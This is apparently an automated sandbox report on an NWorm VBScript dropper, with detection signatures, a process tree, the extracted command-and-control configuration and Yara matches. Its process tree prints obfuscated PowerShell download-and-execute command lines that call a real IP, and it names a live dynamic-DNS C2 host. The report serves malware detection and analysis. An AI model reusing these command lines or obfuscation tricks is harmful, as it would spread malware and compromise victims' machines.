Edit tour

Windows Analysis Report
IUGSPQTEVLEHZIDHGXNQCNHSLWPLEZEYTVKQTSPNFSUAGHIJDDWITOGIYIHRFQGEIXYB.VBS

Overview

General Information

Sample Name:	IUGSPQTEVLEHZIDHGXNQCNHSLWPLEZEYTVKQTSPNFSUAGHIJDDWITOGIYIHRFQGEIXYB.VBS
Analysis ID:	564383
MD5:	0209894dcb294e83c3a8266f8fb6e9f9
SHA1:	990939c763013ba6ec28f980d4778333eff8eaf8
SHA256:	604ec08c350c576a1b01715c3d806861e568206b84c532de5f0999746387d787
Tags:	N-W0rmvbs
Infos:

Detection

NWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

VBScript performs obfuscated calls to suspicious functions

Antivirus detection for URL or domain

Yara detected NWorm

Yara detected Powershell download and execute

Sigma detected: Suspicious Script Execution From Temp Folder

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Very long command line found

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Creates an undocumented autostart registry key

Sigma detected: WScript or CScript Dropper

C2 URLs / IPs found in malware configuration

Uses dynamic DNS services

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sigma detected: Encoded PowerShell Command Line

Java / VBScript file with very long strings (likely obfuscated code)

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Uses cacls to modify the permissions of files

Detected TCP or UDP traffic on non-standard ports

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6892 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\IUGSPQTEVLEHZIDHGXNQCNHSLWPLEZEYTVKQTSPNFSUAGHIJDDWITOGIYIHRFQGEIXYB.VBS" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

powershell.exe (PID: 7064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://103.151.125.186/C/Ps1JDK.txt';Function RRBP([string] $KUFB) {$sFKU = [system.Collections.Generic.list[Byte]]::new();for ($AHYV = 0; $AHYV -lt $KUFB.lengtH; $AHYV +=8) {$sFKU.Add([Convert]::ToByte($KUFB.substring($AHYV, 8), 2))}return [system.Text.encoding]::AsCII.Getstring($sFKU.ToArray())};$eZHV = RRBP 'OWUT1OWUT11OWUT11OWUT111OWUTOWUT11OWUT111OWUT1OWUTOWUTOWUT1OWUT1OWUTOWUT1OWUTOWUT1OWUTOWUT1OWUTOWUT1OWUT1OWUTOWUT111OWUTOWUT1OWUTOWUTOWUT111OWUT1OWUT111OWUT1OWUTOWUT111OWUT1OWUTOWUTOWUT111OWUT1OWUTOWUT11OWUT1OWUT1OWUTOWUT11OWUT1111OWUT1OWUTOWUT1OWUTOWUT1OWUT11OWUT111OWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT1OWUTOWUT111OWUTOWUT1OWUTOWUT111OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT11OWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT1OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT11OWUT111OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUTOWUTOWUTOWUT11OWUTOWUT1OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT111OWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT11OWUTOWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUT11OWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT111OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUTOWUTOWUTOWUT11OWUT11OWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT111OWUTOWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT111OWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT111OWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT111OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT1OWUTOWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT1OWUTOWUT1OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUT11111OWUTOWUTOWUT1OWUTOWUTOWUT11OWUTOWUT1OWUTOWUT1111OWUT1OWUT1OWUTOWUT1OWUTOWUT11OWUTOWUT1OWUT1OWUT11OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUT11OWUT11OWUT1OWUTOWUTOWUTOWUT1111OWUT11OWUT1OWUT11OWUT11OWUT1OWUTOWUTOWUTOWUT11OWUT11OWUT1OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUT1OWUT111OWUTOWUT1OWUTOWUT1OWUT111OWUT1OWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT1OWUTOWUT1OWUTOWUTOWUT1OWUT11111OWUTOWUT1OWUT11OWUT1OWUT1OWUTOWUTOWUTOWUT1OWUTOWUT1111OWUTOWUTOWUTOWUT1OWUTOWUT1111OWUT1OWUT1OWUTOWUT1OWUTOWUTOWUT1OWUTOWUT111OWUTOWUT11OWUTOWUTOWUTOWUTOWUT1111OWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUTOWUT111OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT1OWUTOWUT1OWUT11111OWUT1OWUTOWUT1OWUT1OWUTOWUT1OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT1OWUTOWUT1OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUT11111OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT111OWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUT11OWUT1OWUT1OWUTOWUT11OWUT1OWUT1OWUT1OWUTOWUTOWUT1OWUT1OWUTOWUT1OWUTOWUT1OWUTOWUT1OWUTOWUT1OWUT11OWUT111OWUTOWUT11OWUTOWUT111OWUT1OWUT111OWUT1OWUTOWUT1OWUTOWUT1OWUTOWUTOWUT111OWUT11OWUTOWUT11OWUTOWUT1OWUT1OWUT1OWUT1OWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUT1111OWUT1OWUT1OWUTOWUT11OWUT11OWUTOWUT1OWUT1OWUT111OWUTOWUTOWUTOWUTOWUT1OWUT1OWUTOWUT1OWUTOWUT1OWUTOWUTOWUT1OWUT1OWUT1OWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT1OWUT1OWUT1OWUTOWUT1OWUTOWUT11OWUTOWUT1OWUT1OWUT11OWUT111OWUTOWUT1OWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUT1OWUT1OWUTOWUT1OWUT1OWUTOWUT1OWUT1OWUT11OWUT11OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUT11OWUT1OWUT111OWUT1OWUTOWUT1OWUT1OWUT11OWUTOWUT1OWUTOWUT111OWUT1OWUT11OWUTOWUTOWUTOWUTOWUT1OWUTOWUT111OWUTOWUT1OWUT11OWUT1OWUT11OWUT1OWUT1OWUTOWUT11OWUT1111OWUT11OWUT1OWUTOWUT1OWUT11OWUT111OWUTOWUTOWUT1OWUTOWUT111OWUTOWUT1OWUTOWUT111OWUTOWUT1OWUT1OWUTOWUT1'.RePlace('OWUT','0');IeX $eZHV MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

aspnet_regbrowsers.exe (PID: 4584 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe MD5: B490A24A9328FD89155F075FA26C0DEC)

javaw.exe (PID: 2516 cmdline: "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\tmp2B8A.tmp1991KLI.jar" MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)

icacls.exe (PID: 988 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M MD5: FF0D1D4317A44C951240FAE75075D501)

conhost.exe (PID: 4848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

javaw.exe (PID: 2988 cmdline: "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\tmpB97A.tmp1991.jar" MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)

wscript.exe (PID: 6520 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmpCECD.tmp1991-10-12-2021.js" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

wscript.exe (PID: 7716 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmp3E50.tmp4093-10-12-2021.js" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

wscript.exe (PID: 8804 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmp237D.tmp8904-10-12-2021.js" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

wscript.exe (PID: 10432 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmp6475.tmpALNLKIGNQCUCWBSGJELSLUQCWNFCQJGCQJJJSOQVT.VBS" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

powershell.exe (PID: 11196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://103.151.125.186/A/XADOUYJBEAAKTPUBATDKPHHPFWQWHBJLCEQYKYQXBJVCJFSNIPCUFQWRZQJZZYQWQEIBENEICJLDKPFNEZHXDQGDNDQTJNAPYHD.TXT';( [rUNtIMe.iNTerOpsERVices.mArsHAl]::([rUNtIMe.iNTErOpservIces.MArsHAL].GetMEMbERs()[1].nAMe).Invoke( [rUNtIMe.iNTErOpseRvIces.mArSHAL]::sECURESTRINgtogloBALAlLoCANsI($('76492d1116743f0423413b16050A5345MgB8AHMARgBJAEQATQBLAHMAUQBNAHUASQB0AEIASwBNADcASwBrAGsAVQBpAHcAPQA9AHwAZABhADAAZgA4ADgAZgA2AGQAYgBhADkAMQBmAGQAOQAzAGYAMAA0ADUAOQAzADUANwBiAGQAMwA4ADcAMwAxADEAYwA2AGMAYwA0ADAAZgBlAGYANQBjAGIAYwA3ADkANgBkADIAOQBhADYAZAAyAGMAYgAzADAAOQA2AGIANgBmADEAZgBhAGQAMgAzADcAMwA4AGUAMwBjAGUANwBhADIAZQBiAGEANQBmADIANAAwADEAMQA0AGIAZAAyADkAYwA3ADAANQA4AGIAYQBiAGYAYwAxADQANAAzAGMANwBkADIAMwA0ADQAMABlADQAMQA3AGYANgBiAGEAZQAyAGUANwBlADIAZQA3ADIAMgBmAGUAZAAwADkANgA3ADcAMwA1ADQAMAA5ADcANgA0ADUAOQBkADcAMwAzAGQAOAA3AGUAYwA2ADYAZABhADUANAA0ADcAMwA2ADQAZABhADAAMgA2AGQAMQA5AGQAMgBlADkAZQAyADMAMgBhADEANgAyADcAMAA2AGQAMAA2AGIAYwBjADIANwAwAGQAZgBjAGEAZAAxAGYANQBhADcAOAA5ADIANQBhADQANAAyAA==' | CONVeRTTo-SECUrEStrIng -kE 90,255,13,102,31,9,186,211,78,88,189,227,80,105,238,83,62,34,152,160,216,150,239,195))))| IeX MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 11276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: NWorm

{"Host": "moneyhope81.duckdns.org", "Port": "5052", "Mutex": "a22a16ad", "Version": "v0.3.8", "Network Seprator": "|NW|"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000000.442084442.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
00000007.00000000.442084442.0000000000402000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x2df4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x2e58:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x2e50:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
00000007.00000000.441493494.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
00000007.00000000.441493494.0000000000402000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x2df4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x2e58:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x2e50:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
00000002.00000002.451128327.000001AD00472000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
00000002.00000002.451128327.000001AD00472000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x14ea5c:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x14eac0:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x14eab8:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
00000002.00000002.454898865.000001AD00EC8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
00000002.00000002.454898865.000001AD00EC8000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xfc26c:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xfc2d0:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xfc2c8:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
00000002.00000002.454106266.000001AD00A55000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
00000002.00000002.454106266.000001AD00A55000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x1bf4c:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x1bfb0:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x1bfa8:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
00000002.00000002.454182650.000001AD00A98000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
00000007.00000000.442383411.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
00000007.00000000.442383411.0000000000402000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x2df4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x2e58:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x2e50:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
00000007.00000000.441817870.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
00000007.00000000.441817870.0000000000402000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x2df4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x2e58:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x2e50:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: aspnet_regbrowsers.exe PID: 4584	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xe7c3f:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xe7c71:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xe9fd0:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xea002:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xe7c6d:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM 0xe9ffe:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.0.aspnet_regbrowsers.exe.400000.2.unpack	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
7.0.aspnet_regbrowsers.exe.400000.2.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x2ff4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3058:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3050:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
7.0.aspnet_regbrowsers.exe.400000.2.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x1f8c:$id1: N-W0rm 0x2593:$id1: N-W0rm 0x324f:$x1: pongPing 0x3261:$x2: \|NW\| 0x2e78:$s1: runFile 0x2e88:$s2: runUrl 0x2ed8:$s3: killer 0x2ef8:$s4: powershell 0x30b4:$s5: wscript.exe 0x2f10:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x30cd:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 0x31ef:$s8: Start-Sleep -Seconds 1.5; Remove-Item -Path '
2.2.powershell.exe.1ad00a6df58.2.unpack	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
2.2.powershell.exe.1ad00a6df58.2.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x11f4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x1258:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x1250:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
2.2.powershell.exe.1ad00a6df58.2.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x793:$id1: N-W0rm 0x144f:$x1: pongPing 0x1461:$x2: \|NW\| 0x1078:$s1: runFile 0x1088:$s2: runUrl 0x10d8:$s3: killer 0x10f8:$s4: powershell 0x2d82:$s4: powershell 0x12b4:$s5: wscript.exe 0x1110:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x12cd:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 0x13ef:$s8: Start-Sleep -Seconds 1.5; Remove-Item -Path '
2.2.powershell.exe.1ad00d7d970.3.unpack	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
2.2.powershell.exe.1ad00d7d970.3.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x11f4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x1258:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x1250:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
